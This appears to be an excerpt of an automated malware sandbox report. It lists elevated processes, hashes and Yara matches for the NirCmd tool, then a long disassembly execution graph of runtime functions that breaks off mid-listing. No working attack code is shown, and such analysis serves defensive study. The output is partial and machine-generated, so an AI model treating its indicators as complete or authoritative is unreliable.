                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:119'808 bytes
                                                                                                                                                        MD5 hash:4A9DA765FD91E80DECFD2C9FE221E842
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000022.00000000.3344394477.0000000140017000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000022.00000002.3347749954.0000000140017000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:35
                                                                                                                                                        Start time:05:12:15
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\app_process.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"app_process.exe"
                                                                                                                                                        Imagebase:0x7ff791a00000
                                                                                                                                                        File size:6'063'616 bytes
                                                                                                                                                        MD5 hash:7226BE407EFCC671016739CAD3D26220
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:36
                                                                                                                                                        Start time:05:12:15
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:37
                                                                                                                                                        Start time:05:12:15
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:timeout /t 600
                                                                                                                                                        Imagebase:0x7ff7af6d0000
                                                                                                                                                        File size:32'768 bytes
                                                                                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:9.4%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:19.6%
                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                          Total number of Limit Nodes:58
                                                                                                                                                          execution_graph 19277 7ff714caad69 19280 7ff714c95478 LeaveCriticalSection 19277->19280 16036 7ff714c8bae0 16037 7ff714c8bb0e 16036->16037 16038 7ff714c8baf5 16036->16038 16038->16037 16041 7ff714c9d5fc 16038->16041 16042 7ff714c9d647 16041->16042 16046 7ff714c9d60b _set_fmode 16041->16046 16051 7ff714c94f08 16042->16051 16044 7ff714c9d62e HeapAlloc 16045 7ff714c8bb6e 16044->16045 16044->16046 16046->16042 16046->16044 16048 7ff714ca3590 16046->16048 16054 7ff714ca35d0 16048->16054 16060 7ff714c9b2c8 GetLastError 16051->16060 16053 7ff714c94f11 16053->16045 16059 7ff714ca02d8 EnterCriticalSection 16054->16059 16061 7ff714c9b309 FlsSetValue 16060->16061 16062 7ff714c9b2ec 16060->16062 16063 7ff714c9b31b 16061->16063 16074 7ff714c9b2f9 SetLastError 16061->16074 16062->16061 16062->16074 16077 7ff714c9eb98 16063->16077 16067 7ff714c9b348 FlsSetValue 16070 7ff714c9b354 FlsSetValue 16067->16070 16071 7ff714c9b366 16067->16071 16068 7ff714c9b338 FlsSetValue 16069 7ff714c9b341 16068->16069 16084 7ff714c9a948 16069->16084 16070->16069 16090 7ff714c9aef4 16071->16090 16074->16053 16082 7ff714c9eba9 _set_fmode 16077->16082 16078 7ff714c9ebfa 16081 7ff714c94f08 _set_fmode 10 API calls 16078->16081 16079 7ff714c9ebde HeapAlloc 16080 7ff714c9b32a 16079->16080 16079->16082 16080->16067 16080->16068 16081->16080 16082->16078 16082->16079 16083 7ff714ca3590 _set_fmode 2 API calls 16082->16083 16083->16082 16085 7ff714c9a97c 16084->16085 16086 7ff714c9a94d RtlFreeHeap 16084->16086 16085->16074 16086->16085 16087 7ff714c9a968 GetLastError 16086->16087 16088 7ff714c9a975 Concurrency::details::SchedulerProxy::DeleteThis 16087->16088 16089 7ff714c94f08 _set_fmode 9 API calls 16088->16089 16089->16085 16095 7ff714c9adcc 16090->16095 16107 7ff714ca02d8 EnterCriticalSection 16095->16107 16109 7ff714c99961 16121 7ff714c9a3d8 16109->16121 16126 7ff714c9b150 GetLastError 16121->16126 16127 7ff714c9b191 FlsSetValue 16126->16127 16128 7ff714c9b174 FlsGetValue 16126->16128 16130 7ff714c9b1a3 16127->16130 16145 7ff714c9b181 16127->16145 16129 7ff714c9b18b 16128->16129 16128->16145 16129->16127 16132 7ff714c9eb98 _set_fmode 11 API calls 16130->16132 16131 7ff714c9b1fd SetLastError 16133 7ff714c9a3e1 16131->16133 16134 7ff714c9b21d 16131->16134 16135 7ff714c9b1b2 16132->16135 16148 7ff714c9a504 16133->16148 16136 7ff714c9a504 __CxxCallCatchBlock 38 API calls 16134->16136 16137 7ff714c9b1d0 FlsSetValue 16135->16137 16138 7ff714c9b1c0 FlsSetValue 16135->16138 16139 7ff714c9b222 16136->16139 16141 7ff714c9b1dc FlsSetValue 16137->16141 16142 7ff714c9b1ee 16137->16142 16140 7ff714c9b1c9 16138->16140 16143 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16140->16143 16141->16140 16144 7ff714c9aef4 _set_fmode 11 API calls 16142->16144 16143->16145 16146 7ff714c9b1f6 16144->16146 16145->16131 16147 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16146->16147 16147->16131 16157 7ff714ca3650 16148->16157 16191 7ff714ca3608 16157->16191 16196 7ff714ca02d8 EnterCriticalSection 16191->16196 19028 7ff714caabe3 19029 7ff714caabf3 19028->19029 19032 7ff714c95478 LeaveCriticalSection 19029->19032 19101 7ff714c95410 19102 7ff714c9541b 19101->19102 19110 7ff714c9f2a4 19102->19110 19123 7ff714ca02d8 EnterCriticalSection 19110->19123 16508 7ff714c9f98c 16509 7ff714c9fb7e 16508->16509 16511 7ff714c9f9ce _isindst 16508->16511 16510 7ff714c94f08 _set_fmode 11 API calls 16509->16510 16528 7ff714c9fb6e 16510->16528 16511->16509 16514 7ff714c9fa4e _isindst 16511->16514 16512 7ff714c8c550 _log10_special 8 API calls 16513 7ff714c9fb99 16512->16513 16529 7ff714ca6194 16514->16529 16519 7ff714c9fbaa 16521 7ff714c9a900 _isindst 17 API calls 16519->16521 16523 7ff714c9fbbe 16521->16523 16526 7ff714c9faab 16526->16528 16554 7ff714ca61d8 16526->16554 16528->16512 16530 7ff714c9fa6c 16529->16530 16531 7ff714ca61a3 16529->16531 16536 7ff714ca5598 16530->16536 16561 7ff714ca02d8 EnterCriticalSection 16531->16561 16537 7ff714ca55a1 16536->16537 16541 7ff714c9fa81 16536->16541 16538 7ff714c94f08 _set_fmode 11 API calls 16537->16538 16539 7ff714ca55a6 16538->16539 16540 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16539->16540 16540->16541 16541->16519 16542 7ff714ca55c8 16541->16542 16543 7ff714ca55d1 16542->16543 16544 7ff714c9fa92 16542->16544 16545 7ff714c94f08 _set_fmode 11 API calls 16543->16545 16544->16519 16548 7ff714ca55f8 16544->16548 16546 7ff714ca55d6 16545->16546 16547 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16546->16547 16547->16544 16549 7ff714ca5601 16548->16549 16550 7ff714c9faa3 16548->16550 16551 7ff714c94f08 _set_fmode 11 API calls 16549->16551 16550->16519 16550->16526 16552 7ff714ca5606 16551->16552 16553 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16552->16553 16553->16550 16562 7ff714ca02d8 EnterCriticalSection 16554->16562 19155 7ff714caadfe 19156 7ff714caae0d 19155->19156 19158 7ff714caae17 19155->19158 19159 7ff714ca0338 LeaveCriticalSection 19156->19159 19512 7ff714ca16b0 19523 7ff714ca73e4 19512->19523 19525 7ff714ca73f1 19523->19525 19524 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19524->19525 19525->19524 19526 7ff714ca740d 19525->19526 19527 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19526->19527 19528 7ff714ca16b9 19526->19528 19527->19526 19529 7ff714ca02d8 EnterCriticalSection 19528->19529 16261 7ff714c95628 16262 7ff714c9565f 16261->16262 16263 7ff714c95642 16261->16263 16262->16263 16265 7ff714c95672 CreateFileW 16262->16265 16312 7ff714c94ee8 16263->16312 16267 7ff714c956a6 16265->16267 16268 7ff714c956dc 16265->16268 16286 7ff714c9577c GetFileType 16267->16286 16315 7ff714c95c04 16268->16315 16270 7ff714c94f08 _set_fmode 11 API calls 16273 7ff714c9564f 16270->16273 16277 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16273->16277 16275 7ff714c95710 16341 7ff714c959c4 16275->16341 16276 7ff714c956e5 16336 7ff714c94e7c 16276->16336 16281 7ff714c9565a 16277->16281 16278 7ff714c956d1 CloseHandle 16278->16281 16279 7ff714c956bb CloseHandle 16279->16281 16285 7ff714c956ef 16285->16281 16287 7ff714c95887 16286->16287 16288 7ff714c957ca 16286->16288 16290 7ff714c9588f 16287->16290 16291 7ff714c958b1 16287->16291 16289 7ff714c957f6 GetFileInformationByHandle 16288->16289 16293 7ff714c95b00 21 API calls 16288->16293 16294 7ff714c9581f 16289->16294 16295 7ff714c958a2 GetLastError 16289->16295 16290->16295 16296 7ff714c95893 16290->16296 16292 7ff714c958d4 PeekNamedPipe 16291->16292 16301 7ff714c95872 16291->16301 16292->16301 16298 7ff714c957e4 16293->16298 16299 7ff714c959c4 51 API calls 16294->16299 16297 7ff714c94e7c _fread_nolock 11 API calls 16295->16297 16300 7ff714c94f08 _set_fmode 11 API calls 16296->16300 16297->16301 16298->16289 16298->16301 16303 7ff714c9582a 16299->16303 16300->16301 16302 7ff714c8c550 _log10_special 8 API calls 16301->16302 16304 7ff714c956b4 16302->16304 16358 7ff714c95924 16303->16358 16304->16278 16304->16279 16307 7ff714c95924 10 API calls 16308 7ff714c95849 16307->16308 16309 7ff714c95924 10 API calls 16308->16309 16310 7ff714c9585a 16309->16310 16310->16301 16311 7ff714c94f08 _set_fmode 11 API calls 16310->16311 16311->16301 16313 7ff714c9b2c8 _set_fmode 11 API calls 16312->16313 16314 7ff714c94ef1 16313->16314 16314->16270 16316 7ff714c95c3a 16315->16316 16317 7ff714c94f08 _set_fmode 11 API calls 16316->16317 16335 7ff714c95cd2 __std_exception_copy 16316->16335 16319 7ff714c95c4c 16317->16319 16318 7ff714c8c550 _log10_special 8 API calls 16320 7ff714c956e1 16318->16320 16321 7ff714c94f08 _set_fmode 11 API calls 16319->16321 16320->16275 16320->16276 16322 7ff714c95c54 16321->16322 16365 7ff714c97e08 16322->16365 16324 7ff714c95c69 16325 7ff714c95c71 16324->16325 16326 7ff714c95c7b 16324->16326 16327 7ff714c94f08 _set_fmode 11 API calls 16325->16327 16328 7ff714c94f08 _set_fmode 11 API calls 16326->16328 16332 7ff714c95c76 16327->16332 16329 7ff714c95c80 16328->16329 16330 7ff714c94f08 _set_fmode 11 API calls 16329->16330 16329->16335 16331 7ff714c95c8a 16330->16331 16333 7ff714c97e08 45 API calls 16331->16333 16334 7ff714c95cc4 GetDriveTypeW 16332->16334 16332->16335 16333->16332 16334->16335 16335->16318 16337 7ff714c9b2c8 _set_fmode 11 API calls 16336->16337 16338 7ff714c94e89 Concurrency::details::SchedulerProxy::DeleteThis 16337->16338 16339 7ff714c9b2c8 _set_fmode 11 API calls 16338->16339 16340 7ff714c94eab 16339->16340 16340->16285 16343 7ff714c959ec 16341->16343 16342 7ff714c9571d 16351 7ff714c95b00 16342->16351 16343->16342 16459 7ff714c9f724 16343->16459 16345 7ff714c95a80 16345->16342 16346 7ff714c9f724 51 API calls 16345->16346 16347 7ff714c95a93 16346->16347 16347->16342 16348 7ff714c9f724 51 API calls 16347->16348 16349 7ff714c95aa6 16348->16349 16349->16342 16350 7ff714c9f724 51 API calls 16349->16350 16350->16342 16352 7ff714c95b1a 16351->16352 16353 7ff714c95b51 16352->16353 16354 7ff714c95b2a 16352->16354 16355 7ff714c9f5b8 21 API calls 16353->16355 16356 7ff714c94e7c _fread_nolock 11 API calls 16354->16356 16357 7ff714c95b3a 16354->16357 16355->16357 16356->16357 16357->16285 16359 7ff714c95940 16358->16359 16360 7ff714c9594d FileTimeToSystemTime 16358->16360 16359->16360 16362 7ff714c95948 16359->16362 16361 7ff714c95961 SystemTimeToTzSpecificLocalTime 16360->16361 16360->16362 16361->16362 16363 7ff714c8c550 _log10_special 8 API calls 16362->16363 16364 7ff714c95839 16363->16364 16364->16307 16366 7ff714c97e92 16365->16366 16367 7ff714c97e24 16365->16367 16402 7ff714ca07c0 16366->16402 16367->16366 16369 7ff714c97e29 16367->16369 16370 7ff714c97e41 16369->16370 16371 7ff714c97e5e 16369->16371 16377 7ff714c97bd8 GetFullPathNameW 16370->16377 16385 7ff714c97c4c GetFullPathNameW 16371->16385 16376 7ff714c97e56 __std_exception_copy 16376->16324 16378 7ff714c97c14 16377->16378 16379 7ff714c97bfe GetLastError 16377->16379 16380 7ff714c97c10 16378->16380 16383 7ff714c94f08 _set_fmode 11 API calls 16378->16383 16381 7ff714c94e7c _fread_nolock 11 API calls 16379->16381 16380->16376 16382 7ff714c97c0b 16381->16382 16384 7ff714c94f08 _set_fmode 11 API calls 16382->16384 16383->16380 16384->16380 16386 7ff714c97c7f GetLastError 16385->16386 16391 7ff714c97c95 __std_exception_copy 16385->16391 16387 7ff714c94e7c _fread_nolock 11 API calls 16386->16387 16388 7ff714c97c8c 16387->16388 16389 7ff714c94f08 _set_fmode 11 API calls 16388->16389 16390 7ff714c97c91 16389->16390 16393 7ff714c97d24 16390->16393 16391->16390 16392 7ff714c97cef GetFullPathNameW 16391->16392 16392->16386 16392->16390 16396 7ff714c97d98 memcpy_s 16393->16396 16397 7ff714c97d4d __scrt_get_show_window_mode 16393->16397 16394 7ff714c97d81 16395 7ff714c94f08 _set_fmode 11 API calls 16394->16395 16401 7ff714c97d86 16395->16401 16396->16376 16397->16394 16397->16396 16398 7ff714c97dba 16397->16398 16398->16396 16400 7ff714c94f08 _set_fmode 11 API calls 16398->16400 16399 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16399->16396 16400->16401 16401->16399 16405 7ff714ca05d0 16402->16405 16406 7ff714ca0612 16405->16406 16407 7ff714ca05fb 16405->16407 16409 7ff714ca0616 16406->16409 16410 7ff714ca0637 16406->16410 16408 7ff714c94f08 _set_fmode 11 API calls 16407->16408 16424 7ff714ca0600 16408->16424 16431 7ff714ca073c 16409->16431 16443 7ff714c9f5b8 16410->16443 16413 7ff714ca063c 16419 7ff714ca06e1 16413->16419 16426 7ff714ca0663 16413->16426 16415 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16430 7ff714ca060b __std_exception_copy 16415->16430 16416 7ff714ca061f 16417 7ff714c94ee8 _fread_nolock 11 API calls 16416->16417 16418 7ff714ca0624 16417->16418 16421 7ff714c94f08 _set_fmode 11 API calls 16418->16421 16419->16407 16422 7ff714ca06e9 16419->16422 16420 7ff714c8c550 _log10_special 8 API calls 16423 7ff714ca0731 16420->16423 16421->16424 16425 7ff714c97bd8 13 API calls 16422->16425 16423->16376 16424->16415 16425->16430 16427 7ff714c97c4c 14 API calls 16426->16427 16428 7ff714ca06a7 16427->16428 16429 7ff714c97d24 37 API calls 16428->16429 16428->16430 16429->16430 16430->16420 16432 7ff714ca0786 16431->16432 16433 7ff714ca0756 16431->16433 16434 7ff714ca0791 GetDriveTypeW 16432->16434 16435 7ff714ca0771 16432->16435 16436 7ff714c94ee8 _fread_nolock 11 API calls 16433->16436 16434->16435 16439 7ff714c8c550 _log10_special 8 API calls 16435->16439 16437 7ff714ca075b 16436->16437 16438 7ff714c94f08 _set_fmode 11 API calls 16437->16438 16440 7ff714ca0766 16438->16440 16441 7ff714ca061b 16439->16441 16442 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16440->16442 16441->16413 16441->16416 16442->16435 16457 7ff714caa4d0 16443->16457 16446 7ff714c9f605 16450 7ff714c8c550 _log10_special 8 API calls 16446->16450 16447 7ff714c9f62c 16448 7ff714c9eb98 _set_fmode 11 API calls 16447->16448 16449 7ff714c9f63b 16448->16449 16451 7ff714c9f654 16449->16451 16452 7ff714c9f645 GetCurrentDirectoryW 16449->16452 16453 7ff714c9f699 16450->16453 16455 7ff714c94f08 _set_fmode 11 API calls 16451->16455 16452->16451 16454 7ff714c9f659 16452->16454 16453->16413 16456 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16454->16456 16455->16454 16456->16446 16458 7ff714c9f5ee GetCurrentDirectoryW 16457->16458 16458->16446 16458->16447 16460 7ff714c9f731 16459->16460 16461 7ff714c9f755 16459->16461 16460->16461 16462 7ff714c9f736 16460->16462 16463 7ff714c9f78f 16461->16463 16466 7ff714c9f7ae 16461->16466 16464 7ff714c94f08 _set_fmode 11 API calls 16462->16464 16465 7ff714c94f08 _set_fmode 11 API calls 16463->16465 16467 7ff714c9f73b 16464->16467 16468 7ff714c9f794 16465->16468 16476 7ff714c94f4c 16466->16476 16470 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16467->16470 16471 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 16468->16471 16472 7ff714c9f746 16470->16472 16473 7ff714c9f79f 16471->16473 16472->16345 16473->16345 16474 7ff714c9f7bb 16474->16473 16475 7ff714ca04dc 51 API calls 16474->16475 16475->16474 16477 7ff714c94f70 16476->16477 16478 7ff714c94f6b 16476->16478 16477->16478 16479 7ff714c9b150 __CxxCallCatchBlock 45 API calls 16477->16479 16478->16474 16480 7ff714c94f8b 16479->16480 16484 7ff714c9d984 16480->16484 16485 7ff714c94fae 16484->16485 16486 7ff714c9d999 16484->16486 16488 7ff714c9d9f0 16485->16488 16486->16485 16492 7ff714ca3304 16486->16492 16489 7ff714c9da05 16488->16489 16490 7ff714c9da18 16488->16490 16489->16490 16505 7ff714ca2650 16489->16505 16490->16478 16493 7ff714c9b150 __CxxCallCatchBlock 45 API calls 16492->16493 16494 7ff714ca3313 16493->16494 16495 7ff714ca335e 16494->16495 16504 7ff714ca02d8 EnterCriticalSection 16494->16504 16495->16485 16506 7ff714c9b150 __CxxCallCatchBlock 45 API calls 16505->16506 16507 7ff714ca2659 16506->16507 19329 7ff714c9c520 19340 7ff714ca02d8 EnterCriticalSection 19329->19340 19172 7ff714c9afd0 19173 7ff714c9afd5 19172->19173 19177 7ff714c9afea 19172->19177 19178 7ff714c9aff0 19173->19178 19179 7ff714c9b032 19178->19179 19180 7ff714c9b03a 19178->19180 19181 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19179->19181 19182 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19180->19182 19181->19180 19183 7ff714c9b047 19182->19183 19184 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19183->19184 19185 7ff714c9b054 19184->19185 19186 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19185->19186 19187 7ff714c9b061 19186->19187 19188 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19187->19188 19189 7ff714c9b06e 19188->19189 19190 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19189->19190 19191 7ff714c9b07b 19190->19191 19192 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19191->19192 19193 7ff714c9b088 19192->19193 19194 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19193->19194 19195 7ff714c9b095 19194->19195 19196 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19195->19196 19197 7ff714c9b0a5 19196->19197 19198 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19197->19198 19199 7ff714c9b0b5 19198->19199 19204 7ff714c9ae94 19199->19204 19218 7ff714ca02d8 EnterCriticalSection 19204->19218 19366 7ff714c99d50 19369 7ff714c99ccc 19366->19369 19376 7ff714ca02d8 EnterCriticalSection 19369->19376 19377 7ff714c8cb50 19378 7ff714c8cb60 19377->19378 19394 7ff714c99ba8 19378->19394 19380 7ff714c8cb6c 19400 7ff714c8ce48 19380->19400 19382 7ff714c8d12c 7 API calls 19384 7ff714c8cc05 19382->19384 19383 7ff714c8cb84 _RTC_Initialize 19392 7ff714c8cbd9 19383->19392 19405 7ff714c8cff8 19383->19405 19386 7ff714c8cb99 19408 7ff714c99014 19386->19408 19392->19382 19393 7ff714c8cbf5 19392->19393 19395 7ff714c99bb9 19394->19395 19396 7ff714c94f08 _set_fmode 11 API calls 19395->19396 19399 7ff714c99bc1 19395->19399 19397 7ff714c99bd0 19396->19397 19398 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19397->19398 19398->19399 19399->19380 19401 7ff714c8ce59 19400->19401 19404 7ff714c8ce5e __scrt_acquire_startup_lock 19400->19404 19402 7ff714c8d12c 7 API calls 19401->19402 19401->19404 19403 7ff714c8ced2 19402->19403 19404->19383 19433 7ff714c8cfbc 19405->19433 19407 7ff714c8d001 19407->19386 19409 7ff714c99034 19408->19409 19410 7ff714c8cba5 19408->19410 19411 7ff714c99052 GetModuleFileNameW 19409->19411 19412 7ff714c9903c 19409->19412 19410->19392 19432 7ff714c8d0cc InitializeSListHead 19410->19432 19416 7ff714c9907d 19411->19416 19413 7ff714c94f08 _set_fmode 11 API calls 19412->19413 19414 7ff714c99041 19413->19414 19415 7ff714c9a8e0 _invalid_parameter_noinfo 37 API calls 19414->19415 19415->19410 19448 7ff714c98fb4 19416->19448 19419 7ff714c990c5 19420 7ff714c94f08 _set_fmode 11 API calls 19419->19420 19421 7ff714c990ca 19420->19421 19422 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19421->19422 19422->19410 19423 7ff714c990ff 19425 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19423->19425 19424 7ff714c990dd 19424->19423 19426 7ff714c99144 19424->19426 19427 7ff714c9912b 19424->19427 19425->19410 19430 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19426->19430 19428 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19427->19428 19429 7ff714c99134 19428->19429 19431 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19429->19431 19430->19423 19431->19410 19434 7ff714c8cfd6 19433->19434 19436 7ff714c8cfcf 19433->19436 19437 7ff714c9a1ec 19434->19437 19436->19407 19440 7ff714c99e28 19437->19440 19447 7ff714ca02d8 EnterCriticalSection 19440->19447 19449 7ff714c99004 19448->19449 19450 7ff714c98fcc 19448->19450 19449->19419 19449->19424 19450->19449 19451 7ff714c9eb98 _set_fmode 11 API calls 19450->19451 19452 7ff714c98ffa 19451->19452 19453 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19452->19453 19453->19449 19566 7ff714c952d0 19567 7ff714c952fa 19566->19567 19568 7ff714c9eb98 _set_fmode 11 API calls 19567->19568 19569 7ff714c95319 19568->19569 19570 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19569->19570 19571 7ff714c95327 19570->19571 19572 7ff714c9eb98 _set_fmode 11 API calls 19571->19572 19576 7ff714c95351 19571->19576 19574 7ff714c95343 19572->19574 19575 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19574->19575 19575->19576 19577 7ff714c9535a 19576->19577 19578 7ff714c9f074 19576->19578 19583 7ff714c9ed10 19578->19583 19581 7ff714c9f0af 19581->19576 19582 7ff714c9f0c9 InitializeCriticalSectionAndSpinCount 19582->19581 19584 7ff714c9ed6d 19583->19584 19591 7ff714c9ed68 __vcrt_FlsAlloc 19583->19591 19584->19581 19584->19582 19585 7ff714c9ed9d LoadLibraryExW 19587 7ff714c9ee72 19585->19587 19588 7ff714c9edc2 GetLastError 19585->19588 19586 7ff714c9ee92 GetProcAddress 19586->19584 19590 7ff714c9eea3 19586->19590 19587->19586 19589 7ff714c9ee89 FreeLibrary 19587->19589 19588->19591 19589->19586 19590->19584 19591->19584 19591->19585 19591->19586 19592 7ff714c9edfc LoadLibraryExW 19591->19592 19592->19587 19592->19591 19593 7ff714ca08c8 19594 7ff714ca08ec 19593->19594 19596 7ff714ca08fc 19593->19596 19595 7ff714c94f08 _set_fmode 11 API calls 19594->19595 19618 7ff714ca08f1 19595->19618 19597 7ff714ca0bdc 19596->19597 19598 7ff714ca091e 19596->19598 19599 7ff714c94f08 _set_fmode 11 API calls 19597->19599 19600 7ff714ca093f 19598->19600 19724 7ff714ca0f84 19598->19724 19601 7ff714ca0be1 19599->19601 19604 7ff714ca09b1 19600->19604 19606 7ff714ca0965 19600->19606 19610 7ff714ca09a5 19600->19610 19602 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19601->19602 19602->19618 19608 7ff714c9eb98 _set_fmode 11 API calls 19604->19608 19622 7ff714ca0974 19604->19622 19605 7ff714ca0a5e 19617 7ff714ca0a7b 19605->19617 19623 7ff714ca0acd 19605->19623 19739 7ff714c996c0 19606->19739 19611 7ff714ca09c7 19608->19611 19610->19605 19610->19622 19745 7ff714ca712c 19610->19745 19614 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19611->19614 19613 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19613->19618 19619 7ff714ca09d5 19614->19619 19615 7ff714ca096f 19620 7ff714c94f08 _set_fmode 11 API calls 19615->19620 19616 7ff714ca098d 19616->19610 19625 7ff714ca0f84 45 API calls 19616->19625 19621 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19617->19621 19619->19610 19619->19622 19627 7ff714c9eb98 _set_fmode 11 API calls 19619->19627 19620->19622 19624 7ff714ca0a84 19621->19624 19622->19613 19623->19622 19626 7ff714ca33dc 40 API calls 19623->19626 19634 7ff714ca0a89 19624->19634 19781 7ff714ca33dc 19624->19781 19625->19610 19628 7ff714ca0b0a 19626->19628 19630 7ff714ca09f7 19627->19630 19631 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19628->19631 19635 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19630->19635 19636 7ff714ca0b14 19631->19636 19632 7ff714ca0ab5 19637 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19632->19637 19633 7ff714ca0bd0 19638 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19633->19638 19634->19633 19639 7ff714c9eb98 _set_fmode 11 API calls 19634->19639 19635->19610 19636->19622 19636->19634 19637->19634 19638->19618 19640 7ff714ca0b58 19639->19640 19641 7ff714ca0b60 19640->19641 19642 7ff714ca0b69 19640->19642 19643 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19641->19643 19644 7ff714c9a4a4 __std_exception_copy 37 API calls 19642->19644 19645 7ff714ca0b67 19643->19645 19646 7ff714ca0b78 19644->19646 19650 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19645->19650 19647 7ff714ca0b80 19646->19647 19648 7ff714ca0c0b 19646->19648 19790 7ff714ca7244 19647->19790 19649 7ff714c9a900 _isindst 17 API calls 19648->19649 19652 7ff714ca0c1f 19649->19652 19650->19618 19656 7ff714ca0c48 19652->19656 19663 7ff714ca0c58 19652->19663 19654 7ff714ca0bc8 19659 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19654->19659 19655 7ff714ca0ba7 19657 7ff714c94f08 _set_fmode 11 API calls 19655->19657 19658 7ff714c94f08 _set_fmode 11 API calls 19656->19658 19660 7ff714ca0bac 19657->19660 19661 7ff714ca0c4d 19658->19661 19659->19633 19662 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19660->19662 19662->19645 19664 7ff714ca0f3b 19663->19664 19665 7ff714ca0c7a 19663->19665 19666 7ff714c94f08 _set_fmode 11 API calls 19664->19666 19667 7ff714ca0c97 19665->19667 19809 7ff714ca106c 19665->19809 19668 7ff714ca0f40 19666->19668 19671 7ff714ca0d0b 19667->19671 19673 7ff714ca0cbf 19667->19673 19680 7ff714ca0cff 19667->19680 19669 7ff714c9a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19668->19669 19669->19661 19676 7ff714c9eb98 _set_fmode 11 API calls 19671->19676 19687 7ff714ca0cce 19671->19687 19693 7ff714ca0d33 19671->19693 19672 7ff714ca0dbe 19684 7ff714ca0ddb 19672->19684 19688 7ff714ca0e2e 19672->19688 19824 7ff714c996fc 19673->19824 19681 